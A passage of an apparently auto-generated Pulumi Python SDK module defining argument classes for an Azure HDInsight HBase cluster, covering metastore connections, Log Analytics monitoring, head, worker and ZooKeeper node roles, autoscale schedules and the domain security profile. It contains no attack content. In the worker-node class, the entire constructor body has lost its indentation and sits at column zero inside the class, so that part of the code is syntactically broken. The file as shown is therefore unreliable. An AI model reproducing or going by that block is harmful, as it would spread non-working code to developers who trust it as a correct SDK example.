    def password(self, value: pulumi.Input[str]):
        pulumi.set(self, "password", value)
    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        The username used for the Ambari Portal. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")
    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)
    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
        """
        return pulumi.get(self, "enabled")
    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
@pulumi.input_type
class HBaseClusterMetastoresArgs:
    # Optional external-metastore configuration blocks for the cluster.
    def __init__(__self__, *,
                 ambari: Optional[pulumi.Input['HBaseClusterMetastoresAmbariArgs']] = None,
                 hive: Optional[pulumi.Input['HBaseClusterMetastoresHiveArgs']] = None,
                 oozie: Optional[pulumi.Input['HBaseClusterMetastoresOozieArgs']] = None):
        """
        :param pulumi.Input['HBaseClusterMetastoresAmbariArgs'] ambari: An `ambari` block as defined below.
        :param pulumi.Input['HBaseClusterMetastoresHiveArgs'] hive: A `hive` block as defined below.
        :param pulumi.Input['HBaseClusterMetastoresOozieArgs'] oozie: An `oozie` block as defined below.
        """
        # Every metastore block is optional; record only those supplied.
        for key, block in (("ambari", ambari), ("hive", hive), ("oozie", oozie)):
            if block is not None:
                pulumi.set(__self__, key, block)
    @property
    @pulumi.getter
    def ambari(self) -> Optional[pulumi.Input['HBaseClusterMetastoresAmbariArgs']]:
        """An `ambari` block as defined below."""
        return pulumi.get(self, "ambari")
    @ambari.setter
    def ambari(self, value: Optional[pulumi.Input['HBaseClusterMetastoresAmbariArgs']]):
        pulumi.set(self, "ambari", value)
    @property
    @pulumi.getter
    def hive(self) -> Optional[pulumi.Input['HBaseClusterMetastoresHiveArgs']]:
        """A `hive` block as defined below."""
        return pulumi.get(self, "hive")
    @hive.setter
    def hive(self, value: Optional[pulumi.Input['HBaseClusterMetastoresHiveArgs']]):
        pulumi.set(self, "hive", value)
    @property
    @pulumi.getter
    def oozie(self) -> Optional[pulumi.Input['HBaseClusterMetastoresOozieArgs']]:
        """An `oozie` block as defined below."""
        return pulumi.get(self, "oozie")
    @oozie.setter
    def oozie(self, value: Optional[pulumi.Input['HBaseClusterMetastoresOozieArgs']]):
        pulumi.set(self, "oozie", value)
@pulumi.input_type
class HBaseClusterMetastoresAmbariArgs:
    # Connection settings (SQL server, database and credentials) for an
    # external Ambari metastore.
    def __init__(__self__, *,
                 database_name: pulumi.Input[str],
                 password: pulumi.Input[str],
                 server: pulumi.Input[str],
                 username: pulumi.Input[str]):
        """
        :param pulumi.Input[str] database_name: The external Ambari metastore's existing SQL database. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created.
        :param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created.
        :param pulumi.Input[str] username: The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "database_name", database_name)
        pulumi.set(__self__, "password", password)
        pulumi.set(__self__, "server", server)
        pulumi.set(__self__, "username", username)
    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> pulumi.Input[str]:
        """
        The external Ambari metastore's existing SQL database. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "database_name")
    @database_name.setter
    def database_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "database_name", value)
    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """
        The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "password")
    @password.setter
    def password(self, value: pulumi.Input[str]):
        pulumi.set(self, "password", value)
    @property
    @pulumi.getter
    def server(self) -> pulumi.Input[str]:
        """
        The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "server")
    @server.setter
    def server(self, value: pulumi.Input[str]):
        pulumi.set(self, "server", value)
    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")
    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)
@pulumi.input_type
class HBaseClusterMetastoresHiveArgs:
    # Connection settings (SQL server, database and credentials) for an
    # external Hive metastore.
    def __init__(__self__, *,
                 database_name: pulumi.Input[str],
                 password: pulumi.Input[str],
                 server: pulumi.Input[str],
                 username: pulumi.Input[str]):
        """
        :param pulumi.Input[str] database_name: The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The external Hive metastore's existing SQL server admin password. Changing this forces a new resource to be created.
        :param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Hive metastore. Changing this forces a new resource to be created.
        :param pulumi.Input[str] username: The external Hive metastore's existing SQL server admin username. Changing this forces a new resource to be created.
        """
        # All four settings are mandatory, so store each one unconditionally.
        for key, setting in (("database_name", database_name),
                             ("password", password),
                             ("server", server),
                             ("username", username)):
            pulumi.set(__self__, key, setting)
    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> pulumi.Input[str]:
        """The external Hive metastore's existing SQL database. Changing this forces a new resource to be created."""
        return pulumi.get(self, "database_name")
    @database_name.setter
    def database_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "database_name", value)
    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """The external Hive metastore's existing SQL server admin password. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")
    @password.setter
    def password(self, value: pulumi.Input[str]):
        pulumi.set(self, "password", value)
    @property
    @pulumi.getter
    def server(self) -> pulumi.Input[str]:
        """The fully-qualified domain name (FQDN) of the SQL server to use for the external Hive metastore. Changing this forces a new resource to be created."""
        return pulumi.get(self, "server")
    @server.setter
    def server(self, value: pulumi.Input[str]):
        pulumi.set(self, "server", value)
    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """The external Hive metastore's existing SQL server admin username. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")
    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)
@pulumi.input_type
class HBaseClusterMetastoresOozieArgs:
    # Connection settings (SQL server, database and credentials) for an
    # external Oozie metastore.
    def __init__(__self__, *,
                 database_name: pulumi.Input[str],
                 password: pulumi.Input[str],
                 server: pulumi.Input[str],
                 username: pulumi.Input[str]):
        """
        :param pulumi.Input[str] database_name: The external Oozie metastore's existing SQL database. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The external Oozie metastore's existing SQL server admin password. Changing this forces a new resource to be created.
        :param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Oozie metastore. Changing this forces a new resource to be created.
        :param pulumi.Input[str] username: The external Oozie metastore's existing SQL server admin username. Changing this forces a new resource to be created.
        """
        # All four settings are mandatory, so store each one unconditionally.
        for key, setting in (("database_name", database_name),
                             ("password", password),
                             ("server", server),
                             ("username", username)):
            pulumi.set(__self__, key, setting)
    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> pulumi.Input[str]:
        """The external Oozie metastore's existing SQL database. Changing this forces a new resource to be created."""
        return pulumi.get(self, "database_name")
    @database_name.setter
    def database_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "database_name", value)
    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """The external Oozie metastore's existing SQL server admin password. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")
    @password.setter
    def password(self, value: pulumi.Input[str]):
        pulumi.set(self, "password", value)
    @property
    @pulumi.getter
    def server(self) -> pulumi.Input[str]:
        """The fully-qualified domain name (FQDN) of the SQL server to use for the external Oozie metastore. Changing this forces a new resource to be created."""
        return pulumi.get(self, "server")
    @server.setter
    def server(self, value: pulumi.Input[str]):
        pulumi.set(self, "server", value)
    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """The external Oozie metastore's existing SQL server admin username. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")
    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)
@pulumi.input_type
class HBaseClusterMonitorArgs:
    # Settings linking the cluster to an Operations Management Suite (OMS) /
    # Log Analytics workspace for monitoring.
    def __init__(__self__, *,
                 log_analytics_workspace_id: pulumi.Input[str],
                 primary_key: pulumi.Input[str]):
        """
        :param pulumi.Input[str] log_analytics_workspace_id: The Operations Management Suite (OMS) workspace ID.
        :param pulumi.Input[str] primary_key: The Operations Management Suite (OMS) workspace key.
        """
        pulumi.set(__self__, "log_analytics_workspace_id", log_analytics_workspace_id)
        pulumi.set(__self__, "primary_key", primary_key)
    @property
    @pulumi.getter(name="logAnalyticsWorkspaceId")
    def log_analytics_workspace_id(self) -> pulumi.Input[str]:
        """
        The Operations Management Suite (OMS) workspace ID.
        """
        return pulumi.get(self, "log_analytics_workspace_id")
    @log_analytics_workspace_id.setter
    def log_analytics_workspace_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "log_analytics_workspace_id", value)
    @property
    @pulumi.getter(name="primaryKey")
    def primary_key(self) -> pulumi.Input[str]:
        """
        The Operations Management Suite (OMS) workspace key.
        """
        return pulumi.get(self, "primary_key")
    @primary_key.setter
    def primary_key(self, value: pulumi.Input[str]):
        pulumi.set(self, "primary_key", value)
@pulumi.input_type
class HBaseClusterRolesArgs:
    # Container for the three mandatory node-role configurations of an
    # HDInsight HBase cluster: head, worker and ZooKeeper nodes.
    def __init__(__self__, *,
                 head_node: pulumi.Input['HBaseClusterRolesHeadNodeArgs'],
                 worker_node: pulumi.Input['HBaseClusterRolesWorkerNodeArgs'],
                 zookeeper_node: pulumi.Input['HBaseClusterRolesZookeeperNodeArgs']):
        """
        :param pulumi.Input['HBaseClusterRolesHeadNodeArgs'] head_node: A `head_node` block as defined above.
        :param pulumi.Input['HBaseClusterRolesWorkerNodeArgs'] worker_node: A `worker_node` block as defined below.
        :param pulumi.Input['HBaseClusterRolesZookeeperNodeArgs'] zookeeper_node: A `zookeeper_node` block as defined below.
        """
        pulumi.set(__self__, "head_node", head_node)
        pulumi.set(__self__, "worker_node", worker_node)
        pulumi.set(__self__, "zookeeper_node", zookeeper_node)
    @property
    @pulumi.getter(name="headNode")
    def head_node(self) -> pulumi.Input['HBaseClusterRolesHeadNodeArgs']:
        """
        A `head_node` block as defined above.
        """
        return pulumi.get(self, "head_node")
    @head_node.setter
    def head_node(self, value: pulumi.Input['HBaseClusterRolesHeadNodeArgs']):
        pulumi.set(self, "head_node", value)
    @property
    @pulumi.getter(name="workerNode")
    def worker_node(self) -> pulumi.Input['HBaseClusterRolesWorkerNodeArgs']:
        """
        A `worker_node` block as defined below.
        """
        return pulumi.get(self, "worker_node")
    @worker_node.setter
    def worker_node(self, value: pulumi.Input['HBaseClusterRolesWorkerNodeArgs']):
        pulumi.set(self, "worker_node", value)
    @property
    @pulumi.getter(name="zookeeperNode")
    def zookeeper_node(self) -> pulumi.Input['HBaseClusterRolesZookeeperNodeArgs']:
        """
        A `zookeeper_node` block as defined below.
        """
        return pulumi.get(self, "zookeeper_node")
    @zookeeper_node.setter
    def zookeeper_node(self, value: pulumi.Input['HBaseClusterRolesZookeeperNodeArgs']):
        pulumi.set(self, "zookeeper_node", value)
@pulumi.input_type
class HBaseClusterRolesHeadNodeArgs:
    # Configuration of the cluster's Head Nodes: VM size, administrator
    # credentials and optional virtual-network placement.
    def __init__(__self__, *,
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] username: The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
        :param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        # The remaining settings are optional; record only those supplied.
        for key, setting in (("password", password),
                             ("ssh_keys", ssh_keys),
                             ("subnet_id", subnet_id),
                             ("virtual_network_id", virtual_network_id)):
            if setting is not None:
                pulumi.set(__self__, key, setting)
    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")
    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)
    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "vm_size")
    @vm_size.setter
    def vm_size(self, value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", value)
    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")
    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)
    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "ssh_keys")
    @ssh_keys.setter
    def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", value)
    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created."""
        return pulumi.get(self, "subnet_id")
    @subnet_id.setter
    def subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", value)
    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created."""
        return pulumi.get(self, "virtual_network_id")
    @virtual_network_id.setter
    def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class HBaseClusterRolesWorkerNodeArgs:
def __init__(__self__, *,
target_instance_count: pulumi.Input[int],
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
autoscale: Optional[pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleArgs']] = None,
min_instance_count: Optional[pulumi.Input[int]] = None,
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[int] target_instance_count: The number of instances which should be run for the Worker Nodes.
:param pulumi.Input[str] username: The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleArgs'] autoscale: A `autoscale` block as defined below.
:param pulumi.Input[int] min_instance_count: The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "target_instance_count", target_instance_count)
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if autoscale is not None:
pulumi.set(__self__, "autoscale", autoscale)
if min_instance_count is not None:
warnings.warn("""this has been deprecated from the API and will be removed in version 3.0 of the provider""", DeprecationWarning)
pulumi.log.warn("""min_instance_count is deprecated: this has been deprecated from the API and will be removed in version 3.0 of the provider""")
if min_instance_count is not None:
pulumi.set(__self__, "min_instance_count", min_instance_count)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
    # -- Pulumi accessor pairs: each @property maps a snake_case attribute to
    # -- its camelCase wire name (e.g. "targetInstanceCount") via pulumi.get/set.
    @property
    @pulumi.getter(name="targetInstanceCount")
    def target_instance_count(self) -> pulumi.Input[int]:
        """
        The number of instances which should be run for the Worker Nodes.
        """
        return pulumi.get(self, "target_instance_count")
    @target_instance_count.setter
    def target_instance_count(self, value: pulumi.Input[int]):
        pulumi.set(self, "target_instance_count", value)
    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")
    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)
    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """
        The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "vm_size")
    @vm_size.setter
    def vm_size(self, value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", value)
    @property
    @pulumi.getter
    def autoscale(self) -> Optional[pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleArgs']]:
        """
        A `autoscale` block as defined below.
        """
        return pulumi.get(self, "autoscale")
    @autoscale.setter
    def autoscale(self, value: Optional[pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleArgs']]):
        pulumi.set(self, "autoscale", value)
    # Deprecated upstream: scheduled for removal in provider 3.0 (the
    # constructor emits a DeprecationWarning when this is supplied).
    @property
    @pulumi.getter(name="minInstanceCount")
    def min_instance_count(self) -> Optional[pulumi.Input[int]]:
        """
        The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "min_instance_count")
    @min_instance_count.setter
    def min_instance_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "min_instance_count", value)
    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """
        The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "password")
    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)
    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "ssh_keys")
    @ssh_keys.setter
    def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", value)
    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "subnet_id")
    @subnet_id.setter
    def subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", value)
    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "virtual_network_id")
    @virtual_network_id.setter
    def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class HBaseClusterRolesWorkerNodeAutoscaleArgs:
    """Autoscale configuration for the HBase cluster's Worker Node role."""

    def __init__(__self__, *,
                 recurrence: Optional[pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleRecurrenceArgs']] = None):
        """
        :param pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleRecurrenceArgs'] recurrence: A `recurrence` block as defined below.
        """
        # Guard clause: nothing to record when no recurrence was supplied.
        if recurrence is None:
            return
        pulumi.set(__self__, "recurrence", recurrence)

    @property
    @pulumi.getter
    def recurrence(self) -> Optional[pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleRecurrenceArgs']]:
        """A `recurrence` block as defined below."""
        return pulumi.get(self, "recurrence")

    @recurrence.setter
    def recurrence(self, value: Optional[pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleRecurrenceArgs']]):
        pulumi.set(self, "recurrence", value)
@pulumi.input_type
class HBaseClusterRolesWorkerNodeAutoscaleRecurrenceArgs:
    """Schedule-based (recurrence) autoscale settings for the HBase cluster's Worker Node role."""
    def __init__(__self__, *,
                 schedules: pulumi.Input[Sequence[pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]],
                 timezone: pulumi.Input[str]):
        """
        :param pulumi.Input[Sequence[pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]] schedules: A list of `schedule` blocks as defined below.
        :param pulumi.Input[str] timezone: The time zone for the autoscale schedule times.
        """
        pulumi.set(__self__, "schedules", schedules)
        pulumi.set(__self__, "timezone", timezone)
    @property
    @pulumi.getter
    def schedules(self) -> pulumi.Input[Sequence[pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]]:
        """
        A list of `schedule` blocks as defined below.
        """
        return pulumi.get(self, "schedules")
    @schedules.setter
    def schedules(self, value: pulumi.Input[Sequence[pulumi.Input['HBaseClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]]):
        pulumi.set(self, "schedules", value)
    @property
    @pulumi.getter
    def timezone(self) -> pulumi.Input[str]:
        """
        The time zone for the autoscale schedule times.
        """
        return pulumi.get(self, "timezone")
    @timezone.setter
    def timezone(self, value: pulumi.Input[str]):
        pulumi.set(self, "timezone", value)
@pulumi.input_type
class HBaseClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs:
    """A single autoscale schedule entry: which days, what time, and how many worker nodes."""
    def __init__(__self__, *,
                 days: pulumi.Input[Sequence[pulumi.Input[str]]],
                 target_instance_count: pulumi.Input[int],
                 time: pulumi.Input[str]):
        """
        :param pulumi.Input[Sequence[pulumi.Input[str]]] days: The days of the week to perform autoscale.
        :param pulumi.Input[int] target_instance_count: The number of worker nodes to autoscale at the specified time.
        :param pulumi.Input[str] time: The time of day to perform the autoscale in 24hour format.
        """
        pulumi.set(__self__, "days", days)
        pulumi.set(__self__, "target_instance_count", target_instance_count)
        pulumi.set(__self__, "time", time)
    @property
    @pulumi.getter
    def days(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """
        The days of the week to perform autoscale.
        """
        return pulumi.get(self, "days")
    @days.setter
    def days(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "days", value)
    @property
    @pulumi.getter(name="targetInstanceCount")
    def target_instance_count(self) -> pulumi.Input[int]:
        """
        The number of worker nodes to autoscale at the specified time.
        """
        return pulumi.get(self, "target_instance_count")
    @target_instance_count.setter
    def target_instance_count(self, value: pulumi.Input[int]):
        pulumi.set(self, "target_instance_count", value)
    @property
    @pulumi.getter
    def time(self) -> pulumi.Input[str]:
        """
        The time of day to perform the autoscale in 24hour format.
        """
        return pulumi.get(self, "time")
    @time.setter
    def time(self, value: pulumi.Input[str]):
        pulumi.set(self, "time", value)
@pulumi.input_type
class HBaseClusterRolesZookeeperNodeArgs:
    """Configuration of the Zookeeper Node role for a HDInsight HBase Cluster."""
    def __init__(__self__, *,
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] username: The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
        :param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        # Optional settings are only recorded when explicitly supplied.
        if password is not None:
            pulumi.set(__self__, "password", password)
        if ssh_keys is not None:
            pulumi.set(__self__, "ssh_keys", ssh_keys)
        if subnet_id is not None:
            pulumi.set(__self__, "subnet_id", subnet_id)
        if virtual_network_id is not None:
            pulumi.set(__self__, "virtual_network_id", virtual_network_id)
    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")
    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)
    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """
        The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "vm_size")
    @vm_size.setter
    def vm_size(self, value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", value)
    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """
        The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "password")
    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)
    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "ssh_keys")
    @ssh_keys.setter
    def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", value)
    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "subnet_id")
    @subnet_id.setter
    def subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", value)
    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "virtual_network_id")
    @virtual_network_id.setter
    def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class HBaseClusterSecurityProfileArgs:
    """Enterprise Security Package (Azure AD Domain Services) settings for a HDInsight HBase Cluster."""
    def __init__(__self__, *,
                 aadds_resource_id: pulumi.Input[str],
                 domain_name: pulumi.Input[str],
                 domain_user_password: pulumi.Input[str],
                 domain_username: pulumi.Input[str],
                 ldaps_urls: pulumi.Input[Sequence[pulumi.Input[str]]],
                 msi_resource_id: pulumi.Input[str],
                 cluster_users_group_dns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        :param pulumi.Input[str] aadds_resource_id: The resource ID of the Azure Active Directory Domain Service. Changing this forces a new resource to be created.
        :param pulumi.Input[str] domain_name: The name of the Azure Active Directory Domain. Changing this forces a new resource to be created.
        :param pulumi.Input[str] domain_user_password: The user password of the Azure Active Directory Domain. Changing this forces a new resource to be created.
        :param pulumi.Input[str] domain_username: The username of the Azure Active Directory Domain. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ldaps_urls: A list of the LDAPS URLs to communicate with the Azure Active Directory. Changing this forces a new resource to be created.
        :param pulumi.Input[str] msi_resource_id: The User Assigned Identity for the HDInsight Cluster. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] cluster_users_group_dns: A list of the distinguished names for the cluster user groups. Changing this forces a new resource to be created.
        """
